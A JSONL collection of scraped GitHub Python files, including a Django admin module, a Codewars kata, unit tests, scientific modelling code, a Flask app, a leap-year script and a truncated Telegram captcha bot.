'student_id', 'item_id', 'course_id', 'submission_uuid',\n 'created_at', 'completed_at', 'grading_completed_at',\n )\n search_fields = (\n 'id', 'student_id', 'item_id', 'course_id', 'submission_uuid',\n )\n inlines = (PeerWorkflowItemInline,)\n\n\nclass AssessmentAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for Assessments.\n \"\"\"\n list_display = (\n 'id', 'submission_uuid', 'score_type', 'scorer_id', 'scored_at',\n 'rubric_link',\n )\n search_fields = (\n 'id', 'submission_uuid', 'score_type', 'scorer_id', 'scored_at',\n 'rubric__content_hash',\n )\n readonly_fields = (\n 'submission_uuid', 'rubric_link', 'scored_at', 'scorer_id',\n 'score_type', 'points_earned', 'points_possible', 'feedback',\n 'parts_summary',\n )\n exclude = ('rubric', 'submission_uuid')\n\n def rubric_link(self, assessment_obj):\n \"\"\"\n Returns the rubric link for this assessment.\n \"\"\"\n url = reverse(\n 'admin:assessment_rubric_change',\n args=[assessment_obj.rubric.id]\n )\n return u'{}'.format(\n url, assessment_obj.rubric.content_hash\n )\n rubric_link.allow_tags = True\n rubric_link.admin_order_field = 'rubric__content_hash'\n rubric_link.short_description = 'Rubric'\n\n def parts_summary(self, assessment_obj):\n \"\"\"\n Returns the parts summary of this assessment as HTML.\n \"\"\"\n return \"
\".join(\n html.escape(\n u\"{}/{} - {} - {}: {} - {} - {}\".format(\n part.points_earned,\n part.points_possible,\n part.criterion.name,\n part.criterion.label,\n part.option.name if part.option else \"None\",\n part.option.label if part.option else \"None\",\n part.feedback,\n )\n )\n for part in assessment_obj.parts.all()\n )\n parts_summary.allow_tags = True\n\n\nclass AssessmentFeedbackAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AssessmentFeedbacks.\n \"\"\"\n list_display = ('id', 'submission_uuid',)\n search_fields = ('id', 'submission_uuid',)\n readonly_fields = (\n 'submission_uuid', 'assessments_by', 'options', 'feedback_text'\n )\n exclude = ('assessments',)\n\n def assessments_by(self, assessment_feedback):\n \"\"\"\n Gets all assessments for this feedback.\n \"\"\"\n links = [\n u'{}'.format(\n reverse('admin:assessment_assessment_change', args=[asmt.id]),\n html.escape(asmt.scorer_id)\n )\n for asmt in assessment_feedback.assessments.all()\n ]\n return \", \".join(links)\n assessments_by.allow_tags = True\n\n\nclass AIGradingWorkflowAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AIGradingWorkflows.\n \"\"\"\n list_display = ('uuid', 'submission_uuid')\n search_fields = ('uuid', 'submission_uuid', 'student_id', 'item_id', 'course_id')\n readonly_fields = ('uuid', 'submission_uuid', 'student_id', 'item_id', 'course_id')\n\n\nclass AITrainingWorkflowAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AITrainingWorkflows.\n \"\"\"\n list_display = ('uuid',)\n search_fields = ('uuid', 'course_id', 'item_id',)\n readonly_fields = ('uuid', 'course_id', 'item_id',)\n\n\nclass AIClassifierInline(admin.TabularInline):\n \"\"\"\n Django admin model for AIClassifiers.\n \"\"\"\n model = AIClassifier\n\n\nclass AIClassifierSetAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for AICLassifierSets.\n \"\"\"\n list_display = ('id',)\n search_fields = ('id',)\n inlines = [AIClassifierInline]\n\n\nadmin.site.register(Rubric, RubricAdmin)\nadmin.site.register(PeerWorkflow, PeerWorkflowAdmin)\nadmin.site.register(Assessment, AssessmentAdmin)\nadmin.site.register(AssessmentFeedback, AssessmentFeedbackAdmin)\nadmin.site.register(AIGradingWorkflow, AIGradingWorkflowAdmin)\nadmin.site.register(AITrainingWorkflow, AITrainingWorkflowAdmin)\nadmin.site.register(AIClassifierSet, AIClassifierSetAdmin)\n","repo_name":"luckyjd/lms_edx","sub_path":"edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/openassessment/assessment/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"41789326380","text":"# 100th Kata\n# You are given a message (text) that you choose to read in a mirror (weirdo). Return what you would see,\n# complete with the mirror frame. Example:\n#\n# 'Hello World'\n#\n# would give:\n#\n# *********\n# * olleH *\n# * dlroW *\n# *********\n#\n# Words in your solution should be left-aligned.\n\n\ndef mirror(text):\n    text = text.split()\n    maxim = len(max(text, key=len)) + 4\n    mirror = \"\"\n    for x in text:\n        mirror += \"* \" + x[::-1] + \" \" * (maxim - 4 - len(x)) + \" *\\n\"\n    return \"*\" * maxim + \"\\n\" + mirror + \"*\" * maxim\n","repo_name":"scardenasb/codewars","sub_path":"python3/framed_reflection.py","file_name":"framed_reflection.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74124330115","text":"\"\"\"Test utils_data.\"\"\"\n\nimport tempfile\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom dash_charts import utils_data\n\n\ndef test_enable_verbose_pandas():\n    \"\"\"Test enable_verbose_pandas.\"\"\"\n    pd.set_option('display.max_columns', 0)\n\n    utils_data.enable_verbose_pandas()  # act\n\n    assert pd.get_option('display.max_columns') is None\n\n\ndef test_validate():\n    \"\"\"Test the validate function.\"\"\"\n    schema = {\n        'x': {\n            'items': [{'type': ['integer', 'float']}, {'type': ['integer', 'float']}],\n            'required': True,\n            'type': 'list',\n        },\n        'y': {\n            'items': [{'type': ['integer', 'float']}, {'type': ['integer', 'float']}],\n            'required': False,\n            'type': 'list',\n        },\n    }\n    pass_doc_1 = {'x': [3, -4.0], 'y': [1e-6, 1e6]}\n    pass_doc_2 = {'x': [-1e6, 1e6]}\n    fail_doc_1 = {'x': [1, 2, 3]}\n\n    fail_result = {'x': ['length of list should be 2, it is 3']}  # act\n\n    assert utils_data.validate(pass_doc_1, schema) == {}\n    assert utils_data.validate(pass_doc_2, schema) == {}\n    assert utils_data.validate(fail_doc_1, schema) == fail_result\n\n\ndef test_json_dumps_compact():\n    \"\"\"Test json_dumps_compact.\"\"\"\n    result = utils_data.json_dumps_compact({'A': ['A1', 'A2', 'A3'], 'B': {'C': ['A']}})\n\n    assert result == \"\"\"{\n    \\\"A\\\": [\\\"A1\\\",\\\"A2\\\",\\\"A3\\\"],\n    \\\"B\\\": {\n        \\\"C\\\": [\n            \\\"A\\\"\n        ]\n    }\n}\"\"\"\n\n\ndef test_write_pretty_json():\n    \"\"\"Test write_pretty_json.\"\"\"\n    with tempfile.TemporaryDirectory() as tmp_dir:\n        json_path = Path(tmp_dir) / 'tmp.json'\n        utils_data.write_pretty_json(json_path, {'A': [1, 2, 3], 'B': 2})\n\n        result = json_path.read_text()\n\n    assert result == \"\"\"{\n    \\\"A\\\": [\n        1,\n        2,\n        3\n    ],\n    \\\"B\\\": 2\n}\"\"\"\n\n\ndef test_write_csv():\n    \"\"\"Test write_csv.\"\"\"\n    with tempfile.TemporaryDirectory() as tmp_dir:\n        csv_path = Path(tmp_dir) / 'tmp.json'\n        utils_data.write_csv(csv_path, [['header 1', 'headder 2'], ['row 1', 'a'], ['row 2', 'b']])\n\n        result = csv_path.read_text()\n\n    assert result == 'header 1,headder 2\\nrow 1,a\\nrow 2,b\\n'\n\n\ndef test_get_unix():\n    \"\"\"Test get_unix.\"\"\"\n    result = utils_data.get_unix('31Dec1999', '%d%b%Y')\n\n    assert result == 946616400.0\n\n\ndef test_format_unix():\n    \"\"\"Test format_unix.\"\"\"\n    result = utils_data.format_unix(946616400, '%d%b%Y')\n\n    assert result == '31Dec1999'\n\n\ndef test_uniq_table_id():\n    \"\"\"Test uniq_table_id.\"\"\"\n    result = utils_data.uniq_table_id()\n\n    assert result.startswith('U')\n    assert len(result) == 20\n\n\ndef test_list_sql_tables():\n    \"\"\"Test list_sql_tables.\"\"\"\n    with tempfile.TemporaryDirectory() as tmp_dir:\n        db_path = Path(tmp_dir) / 'tmp.db'\n        with utils_data.SQLConnection(db_path) as conn:\n            # Create EVENTS table\n            cursor = conn.cursor()\n            cursor.execute(\"\"\"CREATE TABLE EVENTS (\n                id INT PRIMARY KEY NOT NULL,\n                label TEXT NOT NULL\n            );\"\"\")\n            cursor.execute(\"\"\"CREATE TABLE MAIN (\n                id INT PRIMARY KEY NOT NULL,\n                value INT NOT NULL\n            );\"\"\")\n            conn.commit()\n\n        result = utils_data.list_sql_tables(db_path)\n\n    assert result == ['EVENTS', 'MAIN']\n","repo_name":"KyleKing/dash_charts","sub_path":"tests/test_utils_data.py","file_name":"test_utils_data.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"}
+{"seq_id":"17909306052","text":"from bbrl.workspace import Workspace\nfrom bbrl_examples.models.envs import create_no_reset_env_agent\nimport numpy as np\nimport hydra\nfrom omegaconf import OmegaConf as oc\nfrom bbrl_examples.algos.cem.rliable_generation import rliable_report as rly\nfrom bbrl_examples.algos.cem.rliable_generation import JSON_Generator as json_gen\nfrom bbrl_examples.algos.cem.rliable_generation import rliable_helpers as h\nfrom bbrl_examples.algos.cem.complex_function.cem_actuel import create_CEM_agent\nfrom bbrl_examples.algos.cem.complex_function.constant import *\nfrom bbrl_examples.algos.cem.complex_function.algorithm_copy import *\nimport inspect\nfrom bbrl_examples.algos.cem.complex_function import test_function\nfrom bbrl_examples.algos.cem.complex_function.algorithm_copy import *\n\nimport copy\n\nls_algos = [CEM, CEMi, CEM_plus_CEMi]\n\ndef rename(newname):\n\tdef decorator(f):\n\t\tf.__name__ = newname\n\t\treturn f\n\treturn decorator\n\ndef make_jsons_for_all_GYM_env(nb_runs,lst_GYM_configs):\n\t\n\tls_envs = []\n\tlst_parameter_dict = []\n\tfor c in lst_GYM_configs:\n\t\t\n\t\tcfg = oc.load(\"./configs/\"+c)\n\n\t\teval_env_agent = create_no_reset_env_agent(cfg)\n\t\teval_agent = create_CEM_agent(cfg, eval_env_agent)\n\t\t\n\n\t\tcentroid = torch.nn.utils.parameters_to_vector(eval_agent.parameters())\n\t\t\n\t\t# -------------------------------------------------------------------------------------\n\t\t# To modify: c -> cfg.gym_env.env_name\n\t\t@rename(c)\n\t\tdef score_function(w,eval_agent=eval_agent):\n\t\t\tworkspace = Workspace()\n\t\t\ttorch.nn.utils.vector_to_parameters(w, eval_agent.parameters())\n\t\t\teval_agent(workspace, t=0, stop_variable=\"env/done\")\n\t\t\trewards = workspace[\"env/cumulated_reward\"][-1]\n\t\t\tmean_reward = rewards.mean()\n\n\t\t\treturn -mean_reward\n\t\t\n\t\t\n\t\tconf = cfg.algorithm\n\t\t\n\t\tparameter_dict = {'seuil_convergence': conf.seuil_convergence, 'delta_convergence': conf.delta_convergence,'centroid': torch.FloatTensor(\n\t\tcentroid), 'seed': conf.seed, 'sigma': conf.sigma, 'noise_multiplier': conf.noise_multiplier, 'max_epochs': conf.max_epochs, 'pop_size': conf.pop_size, 'elites_nb': conf.elites_nb}\n\n\t\tls_envs.append(score_function)\n\t\tlst_parameter_dict.append(parameter_dict)\n\t\n\t\n\tjson = json_gen.JSON_Generator(\n\t\tls_envs, ls_algos, nb_runs, lst_parameter_dict)\n\t\t\n\tjson.generate_jsons()\n\n# make_jsons_for_all_GYM_env(4, [\"cem_cartpole.yaml\",\"cem_acrobot.yaml\",\"cem_mountaincar.yaml\",\"cem_pendulum.yaml\"])\n\n\ndef get_min_maxs(ls_algos, folder_json):\n\t\"\"\"\n\t# Input\n\t\tlist of the algorithms used\n\t\tfolder of the json files\n\n\t# Output\n\t\t2 dicts with the respective mins and maxs of the different algos in folder_json\n\t\"\"\"\n\tls_algos = [algo.__name__ for algo in ls_algos]\n\tdict_json = [h.load_json(alg, folder_json) for alg in ls_algos]\n\n\tls_env = list(dict_json[0].keys())\n\n\tdict_mini = {}\n\tdict_maxi = {}\n\n\tfor env in ls_env:\n\t\tls_env_vals = []\n\t\tfor dict in dict_json:\n\t\t\tls = np.asarray(dict[env])\n\t\t\tls_env_vals.append(ls)\n\t\tls_env_vals = np.asarray(ls_env_vals).flatten()\n\t\tdict_mini[env] = np.min(ls_env_vals)\n\t\tdict_maxi[env] = np.max(ls_env_vals)\n\treturn dict_mini, dict_maxi\n\ndef make_rliable_analysis():\n\tls_algos_names = [algo.__name__ for algo in ls_algos]\n\tmins, maxs = get_min_maxs(ls_algos, './FolderJson')\n\tanalyzer = rly.rliable_Analyzer(ls_algos_names, './FolderJson', mins, maxs)\n\tanalyzer.plot_sample_efficiency_curve()\n\tanalyzer.plot_performance_profiles()\n\tanalyzer.plot_aggregate_metrics()\n\tls_pairs = [ ('CEM','CEMi') , ('CEM','CEM_plus_CEMi'), ('CEMi','CEM_plus_CEMi')]\n\tanalyzer.plot_probability_improvement(ls_pairs)\n\nmake_rliable_analysis()","repo_name":"srsrb/Improved_CrossEntropyMethod","sub_path":"src/complex_function/test_rliable_on_GYM.py","file_name":"test_rliable_on_GYM.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14215497641","text":"import matplotlib.pyplot as plt\n\nfrom src.single_tree.development_tree_reader import read_all_trees\nfrom src.single_tree.development_tree_utils import prepare_trees\nfrom src.single_tree.global_params import GlobalParams\nfrom src.view.draw_compared_trees import TreeDrawSettings, TreeDrawer, reduced_node_caption_1, double_node_caption_1, \\\n load_font, FONT_PATH, node_dist_caption_2\n\nmax_level = 10\nparam_a = 0.5\nis_reducing = False\nglobal_params = GlobalParams(max_level=max_level, param_a=param_a)\n\ndraw_settings = TreeDrawSettings(color_left=0xFF285EDD, color_right=0xFFFC7074,\n color_eq=0xFFE8E4DE, color_ineq=0xFFE8E4DE,\n get_node_caption_1=double_node_caption_1,\n get_node_caption_2=node_dist_caption_2,\n font=load_font(FONT_PATH, 10),\n legend_font=load_font(FONT_PATH, 20),\n width=2000, height=720)\ntree_drawer = TreeDrawer(draw_settings, global_params)\n\n# read and prepare trees: reduce if necessary, precalculate some parameters\n# notice: file names must be \"Genus_specie_type.xtg\", and it will be shown as \"Genus specie\"\ntrees = read_all_trees(pattern=\"test/test_input/sofa/test_reduce*.xtg\", is_test_nodes=True, max_level=max_level)\n#trees = read_all_trees(pattern=\"test/test_input/paper_m/M2_*.xtg\", is_test_nodes=True)\n#trees = read_all_trees(pattern=\"test/test_input/test_reduce*.xtg\", is_test_nodes=True)\ntrees = sorted(list(trees), key=lambda x: x.name)\nprepare_trees(trees, max_level, is_reducing=is_reducing, use_min_common_depth=False, use_flipping=False)\n\n# get N*(N-1) tree pairs, superimpose and draw\nfor i in range(0, len(trees)):\n for j in range(i + 1, len(trees)):\n im = tree_drawer.draw_tree(trees[i], trees[j], \"\")\n plt.imshow(im)\n plt.show()\n","repo_name":"npakudin/embrionic_tree","sub_path":"src/draw_test_trees.py","file_name":"draw_test_trees.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41637758458","text":"r\"\"\"\nPore-scale models for calculating the advective-diffusive conductance of\nconduits.\n\"\"\"\nimport numpy as _np\n\n__all__ = [\"ad_dif\"]\n\n\ndef ad_dif(target,\n           pore_pressure='pore.pressure',\n           conduit_lengths='throat.conduit_lengths',\n           throat_hydraulic_conductance='throat.hydraulic_conductance',\n           throat_diffusive_conductance='throat.diffusive_conductance',\n           s_scheme='powerlaw'):\n    r\"\"\"\n    Calculates the advective-diffusive conductance of conduits in network.\n\n    A conduit is defined as ( 1/2 pore - full throat - 1/2 pore ). See the\n    notes section.\n\n    Parameters\n    ----------\n    target : GenericPhysics\n        The Physics object which this model is associated with. This\n        controls the length of the calculated array, and also provides\n        access to other necessary properties.\n    conduit_lengths : str\n        Dictionary key of the conduit length values\n    pore_pressure : str\n        Dictionary key of the pore pressure values\n    throat_hydraulic_conductance : str\n        Dictionary key of the throat hydraulic conductance values\n    throat_diffusive_conductance : str\n        Dictionary key of the throat diffusive conductance values\n    s_scheme : str\n        Name of the space discretization scheme to use\n\n    Returns\n    -------\n    g : ndarray\n        Array containing advective-diffusive conductance values for\n        conduits in the geometry attached to the given physics object.\n\n    Notes\n    -----\n    This function requires that all the necessary phase properties already\n    be calculated.\n\n    This function calculates the specified property for the *entire*\n    network then extracts the values for the appropriate throats at the\n    end.\n\n    This function assumes cylindrical throats with constant cross-section\n    area. Corrections for different shapes and variable cross-section area\n    can be imposed by passing the proper conduit_shape_factors argument\n    when computing the diffusive and hydraulic conductances.\n\n    shape_factor depends on the physics of the problem, i.e.\n    diffusion-like processes and fluid flow need different shape factors.\n\n    \"\"\"\n    network = target.project.network\n    throats = network.map_throats(throats=target.Ts, origin=target)\n    phase = target.project.find_phase(target)\n    cn = network['throat.conns'][throats]\n    # Getting conduit lengths\n    L1 = network[conduit_lengths + '.pore1'][throats]\n    Lt = network[conduit_lengths + '.throat'][throats]\n    L2 = network[conduit_lengths + '.pore2'][throats]\n    # Preallocating g\n    g1, g2, gt = _np.zeros((3, len(Lt)))\n    # Setting g to inf when Li = 0 (ex. boundary pores)\n    # INFO: This is needed since area could also be zero, which confuses NumPy\n    m1, m2, mt = [Li != 0 for Li in [L1, L2, Lt]]\n    g1[~m1] = g2[~m2] = gt[~mt] = _np.inf\n    # Find g for half of pore 1, throat, and half of pore 2\n    P = phase[pore_pressure]\n    gh = phase[throat_hydraulic_conductance][throats]\n    gd = phase[throat_diffusive_conductance][throats]\n    if gd.size == throats.size:\n        gd = _np.tile(gd, 2)\n    # Special treatment when gd is not Nt by 1 (ex. mass partitioning)\n    elif gd.size == 2 * throats.size:\n        gd = gd.reshape(throats.size * 2, order='F')\n    else:\n        raise Exception(f\"Shape of {throat_diffusive_conductance} must either\"\n                        r\" be (Nt,1) or (Nt,2)\")\n\n    Qij = -gh * _np.diff(P[cn], axis=1).squeeze()\n    Qij = _np.append(Qij, -Qij)\n\n    Peij = Qij / gd\n    Peij[(Peij < 1e-10) & (Peij >= 0)] = 1e-10\n    Peij[(Peij > -1e-10) & (Peij <= 0)] = -1e-10\n\n    # Correct the flow rate\n    Qij = Peij * gd\n\n    if s_scheme == 'upwind':\n        w = gd + _np.maximum(0, -Qij)\n    elif s_scheme == 'hybrid':\n        w = _np.maximum(0, _np.maximum(-Qij, gd - Qij / 2))\n    elif s_scheme == 'powerlaw':\n        w = gd * _np.maximum(0, (1 - 0.1 * _np.absolute(Peij))**5) + \\\n            _np.maximum(0, -Qij)\n    elif s_scheme == 'exponential':\n        w = -Qij / (1 - _np.exp(Peij))\n    else:\n        raise Exception('Unrecognized discretization scheme: ' + s_scheme)\n    w = w.reshape(throats.size, 2, order='F')\n    return w\n","repo_name":"halotudio/openPNM-copy2","sub_path":"openpnm/models/physics/ad_dif_conductance.py","file_name":"ad_dif_conductance.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32479572630","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nfrom sklearn.tree import export_graphviz\n\ndataset = pd.read_csv(r\"data_files\\FINAL_DATASET.csv\")\ntestset = pd.read_csv(r\"data_files\\KM4U.csv\")\n\ndataset.head()\nprint(dataset)\n\n#Data Preprocessing\nX_train = dataset.iloc[:, :-1].values\ny_train = dataset.iloc[:, -1].values\nX_test = testset.iloc[:, :-1].values\ny_test = testset.iloc[:, -1].values\nfeatures = ['Context','Acceptance','Accuracy']\n\n#train the model with the help of RandomForestClassifier class of sklearn\n#classifier = RandomForestClassifier(n_estimators = 100)\nclassifier = ExtraTreesClassifier(n_estimators=10, max_depth=None,min_samples_split=2, random_state=0) #Forests of extremely randomized trees\nclassifier.fit(X_train, y_train)\nclassifier_limited = classifier.estimators_[5]\n\n##To make a prediction\ny_pred = classifier.predict(X_test)\n#np.set_printoptions(threshold=sys.maxsize)\n#print(y_pred)\ny_pred = y_pred.tolist()\nprint(y_pred)\n\ncount_0 = 0\ncount_1 = 0\ncount_2 = 0\n\nfor num in y_pred:\n if num == 0:\n count_0 += 1\n elif num == 1:\n count_1 += 1\n elif num == 2:\n count_2 += 1\n\nprint(\"----Algorithm Classification Results----\")\nprint(\"Low Quality:\",count_0)\nprint(\"Medium Quality:\",count_1)\nprint(\"High Quality:\",count_2)\n\nexport_graphviz(classifier_limited,out_file='trees.dot',\n feature_names = features,\n rounded = True, proportion = False,\n precision = 4, filled = True)\nfrom subprocess import call\ncall(['dot', '-Tpng', 'trees.dot', '-o', 'images\\ rf_classify.png', '-Gdpi=600'])\nfrom IPython.display import Image\nImage(filename = 'images\\ rf_classify.png')","repo_name":"casporo/pythonfile","sub_path":".idea/CGKS Algorithm/rf_classify_final.py","file_name":"rf_classify_final.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"3997667014","text":"import json\nimport plotly\nimport pandas as pd\nimport joblib\nimport plotly.express as px\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nfrom plotly.graph_objs import Pie, Bar\nfrom sqlalchemy import create_engine\n\n\napp = Flask(__name__)\n\ndef tokenize(text):\n    tokens = word_tokenize(text)\n    lemmatizer = WordNetLemmatizer()\n\n    clean_tokens = []\n    for tok in tokens:\n        clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n        clean_tokens.append(clean_tok)\n\n    return clean_tokens\n\n# load data\nengine = create_engine('sqlite:///../data/DisasterResponse.db')\ndf = pd.read_sql_table('messages_categories', engine)\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\n\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n    \n    genre_counts = df['genre'].value_counts()\n    fig = px.pie(genre_counts, names=genre_counts.index, values=genre_counts.values, title='Genre Distribution')\n\n    # Create the pie chart\n    fig = px.pie(genre_counts, names=genre_counts.index, values=genre_counts.values, title='Genre Distribution')\n\n    # Extract the necessary information\n    genre_labels = genre_counts.index.tolist()\n    genre_percentages = [float(value) for value in genre_counts.values / genre_counts.sum() * 100]\n\n    category_columns = ['related', 'request', 'offer', 'aid_related', 'medical_help', 'medical_products',\n                        'search_and_rescue', 'security', 'military', 'child_alone', 'water', 'food', \n                        'shelter', 'clothing', 'money', 'missing_people', 'refugees', 'death',\n                        'other_aid', 'infrastructure_related', 'transport', 'buildings',\n                        'electricity', 'tools', 'hospitals', 'shops', 'aid_centers',\n                        'other_infrastructure', 'weather_related', 'floods', 'storm',\n                        'fire', 'earthquake', 'cold', 'other_weather', 'direct_report']\n    \n    category_counts = df[category_columns].sum().sort_values(ascending=False)\n    category_names = list(category_counts.index)\n\n\n    # create visuals\n    # TODO: Below is an example - modify to create your own visuals\n    graphs = [\n        {\n            'data': [\n                Pie(\n                    labels=genre_counts.index,\n                    values=genre_counts.values\n                )\n            ],\n            'layout': {\n                'title': 'Genre Distribution'\n            }\n        },\n        {\n            'data': [\n                Bar(\n                    x=category_names,\n                    y=category_counts\n                )\n            ],\n            'layout': {\n                'title': 'Category Distribution',\n                'yaxis': {\n                    'title': \"Number of Messages\"\n                },\n                'xaxis': {\n                    'title': \"Categories\"\n                }\n            }\n        }\n    ]\n    \n    # encode plotly graphs in JSON\n    ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n    graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n    \n    # render web page with plotly graphs\n    return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n    # save user input in query\n    query = request.args.get('query', '') \n\n    # use model to predict classification for query\n    classification_labels = model.predict([query])[0]\n    classification_results = dict(zip(df.columns[4:], classification_labels))\n\n    # This will render the go.html Please see that file.\n    return render_template(\n        'go.html',\n        query=query,\n        classification_result=classification_results\n    )\n\n\ndef main():\n    app.run(host='0.0.0.0', port=3000, debug=True)\n\n\nif __name__ == '__main__':\n    main()","repo_name":"rafhsilv/disaster-response-pipeline","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1983957223","text":"def leap_year(year):\r\n    if year%400==0:\r\n        print(f\"{year} is a leap year\")\r\n        return True\r\n    elif year%4==0 and year%100!=0:\r\n        print(f\"{year} is a LEAP YEAR\")\r\n        return True\r\n    else:\r\n        print(f\"{year} is not a LEAP YEAR\")\r\n        return False\r\ndef month_in_year(year,month):\r\n    month_days=[31,28,31,30,31,30,31,31,30,31,30,31]\r\n\r\n    if leap_year(year) and month==2:\r\n        month_days = 29\r\n        print(f\"The Year {year} Has {month_days} Days In Month {month} \")\r\n    else:\r\n        print(f\"The Year {year} Has {month_days[month-1]} Days In Month {month} \")\r\n\r\nyear=int(input(\"Enter the year : \"))\r\nmonth=int(input(\"Enter the month in number : \"))\r\nmonth_in_year(year,month)\r\n","repo_name":"Navinulchemy/python-projects","sub_path":"leap year.py","file_name":"leap year.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40194896251","text":"# !/usr/bin/env python3\nimport asyncio\nimport json\nimport threading\nimport logging, subprocess\nfrom time import time, sleep\n# from challenge import Challenge\nfrom pyrogram import (Client, Filters, Message, User, InlineKeyboardButton,\n                      InlineKeyboardMarkup, CallbackQuery, ChatPermissions)\nfrom pyrogram.errors import ChatAdminRequired, ChannelPrivate, ChannelInvalid\nfrom Timer import Timer\nimport re\n\n_app: Client = None\n_channel: str = None\n_start_message: str = None\n# _challenge_scheduler = sched.scheduler(time, sleep)\n_current_challenges = dict()\n_cch_lock = threading.Lock()\n_config = dict()\nlogging.basicConfig(level=logging.INFO)\n# Set up logging so that detailed output shows up in places such as systemctl status captchabot.\n\n\ndef load_config():\n    global _config\n    with open(\"config.json\", encoding=\"utf-8\") as f:\n        _config = json.load(f)\n\n\ndef save_config():\n    with open(\"config.json\", \"w\") as f:\n        json.dump(_config, f, indent=4)\n\n\ndef _update(app):\n    @app.on_message(Filters.command(\"help\") & Filters.group)\n    async def helping_cmd(client: Client, message: Message):\n        _me: User = await client.get_me()\n        logging.info(message.text)\n        await message.reply(_config[\"*\"][\"msg_self_introduction\"])\n\n    @app.on_message(Filters.command(\"ping\"))\n    async def ping_command(client: Client, message: Message):\n        await message.reply(\"poi~\")\n\n    @app.on_message(Filters.command(\"start\") & Filters.private)\n    async def start_command(client: Client, message: Message):\n        await message.reply(_start_message)\n\n    @app.on_callback_query()\n    async def challenge_callback(client: Client,\n                                 callback_query: CallbackQuery):\n        query_data = str(callback_query.data)\n        query_id = callback_query.id\n        chat_id = callback_query.message.chat.id\n        user_id = callback_query.from_user.id\n        msg_id = callback_query.message.message_id\n        chat_title = callback_query.message.chat.title\n        user_name = callback_query.from_user.first_name\n        group_config = _config.get(str(chat_id), _config[\"*\"])\n        if query_data in [\"+\", \"-\"]:\n            admins = await client.get_chat_members(chat_id,\n                                                   filter=\"administrators\")\n            if not any([\n                    admin.user.id == user_id and\n                    (admin.status == \"creator\" or admin.can_restrict_members)\n                    for admin in admins\n            ]):\n                await client.answer_callback_query(\n                    query_id, group_config[\"msg_permission_denied\"])\n                return\n\n            ch_id = \"{chat}|{msg}\".format(chat=chat_id, msg=msg_id)\n            _cch_lock.acquire()\n            # target: int = None\n            target, timeout_event = _current_challenges.get(\n                ch_id, (None, None))\n            if ch_id in _current_challenges:\n                del _current_challenges[ch_id]\n            _cch_lock.release()\n            timeout_event.stop()\n\n            if query_data == \"+\":\n                try:\n                    await client.restrict_chat_member(\n                        chat_id,\n                        target,\n                        permissions=ChatPermissions(\n                            can_send_other_messages=True,\n                            can_send_messages=True,\n                            can_send_media_messages=True,\n                            can_add_web_page_previews=True,\n                        ))\n                except ChatAdminRequired:\n                    await client.answer_callback_query(\n                        query_id, group_config[\"msg_bot_no_permission\"])\n                    return\n\n                await client.edit_message_text(\n                    chat_id,\n                    msg_id,\n                    group_config[\"msg_approved\"].format(user=user_name),\n                    reply_markup=None,\n                )\n                _me: User = await client.get_me()\n                try:\n                    await client.send_message(\n                        int(_channel),\n                        _config[\"msg_passed_admin\"].format(\n                            botid=str(_me.id),\n                            targetuser=str(target),\n                            groupid=str(chat_id),\n                            grouptitle=str(chat_title),\n                        ),\n                        parse_mode=\"Markdown\",\n                    )\n                except Exception as e:\n                    logging.error(str(e))\n            else:\n                try:\n                    await client.kick_chat_member(chat_id, target)\n                except ChatAdminRequired:\n                    await client.answer_callback_query(\n                        query_id, group_config[\"msg_bot_no_permission\"])\n                    return\n                await client.edit_message_text(\n                    chat_id,\n                    msg_id,\n                    group_config[\"msg_refused\"].format(user=user_name),\n                    reply_markup=None,\n                )\n                _me: User = await client.get_me()\n                try:\n                    await client.send_message(\n                        int(_channel),\n                        _config[\"msg_failed_admin\"].format(\n                            botid=str(_me.id),\n                            targetuser=str(target),\n                            groupid=str(chat_id),\n                            grouptitle=str(chat_title),\n                        ),\n                        parse_mode=\"Markdown\",\n                    )\n                except Exception as e:\n                    logging.error(str(e))\n            await client.answer_callback_query(query_id)\n            return\n\n        ch_id = \"{chat}|{msg}\".format(chat=chat_id, msg=msg_id)\n        _cch_lock.acquire()\n        target, timeout_event = _current_challenges.get(ch_id, 